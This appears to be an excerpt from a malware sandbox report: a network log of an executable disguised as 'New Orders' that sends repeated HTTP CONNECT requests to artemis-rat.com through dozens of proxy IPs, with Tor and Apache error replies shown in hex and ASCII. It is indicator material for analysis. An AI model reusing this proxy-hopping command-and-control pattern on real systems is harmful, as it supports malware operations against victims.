                                                                                        Mar 11, 2024 16:17:39.742058039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.821377993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.972208977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1860192.168.2.95480565.49.38.20231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.646213055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1861192.168.2.95255245.128.135.25510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.646461010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1862192.168.2.95254351.89.173.40265457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.653007030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1863192.168.2.95468645.188.164.4819947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.653234005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.678391933 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1864192.168.2.952625162.214.121.1129937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.657390118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773323059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.773893118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.773539066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.777388096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1865192.168.2.954699165.227.221.8380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.657421112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.741983891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.089930058 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1866192.168.2.95478579.106.228.21280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.689611912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1867192.168.2.95259651.89.173.40110587672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.689815044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1868192.168.2.95474751.161.131.84199877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.692998886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.742119074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.742086887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.741995096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1869192.168.2.954705103.86.1.25541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.724355936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1870192.168.2.952247184.170.249.6541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.738249063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1871192.168.2.952702129.213.150.205807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.738456011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1872192.168.2.954788103.122.84.10856787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.755088091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1873192.168.2.954872103.76.12.5831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.840965033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1874192.168.2.95484951.158.98.211163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.849423885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945173025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037810087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.791933060 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1875192.168.2.954832217.182.210.152807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.852260113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945203066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.287240028 CET805INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:17:16 GMT
                                                                                        Server: Apache/2.4.55 (Ubuntu)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.55 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1876192.168.2.952845195.114.209.50807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.857938051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.526853085 CET536INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:54 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 618
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform the
                                                                                        Mar 11, 2024 16:16:54.526879072 CET274INData Raw: 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73
                                                                                        Data Ascii: m of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Por


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1877192.168.2.95276180.87.200.14090507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.861357927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.201721907 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1878192.168.2.95288280.78.64.7041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.870426893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
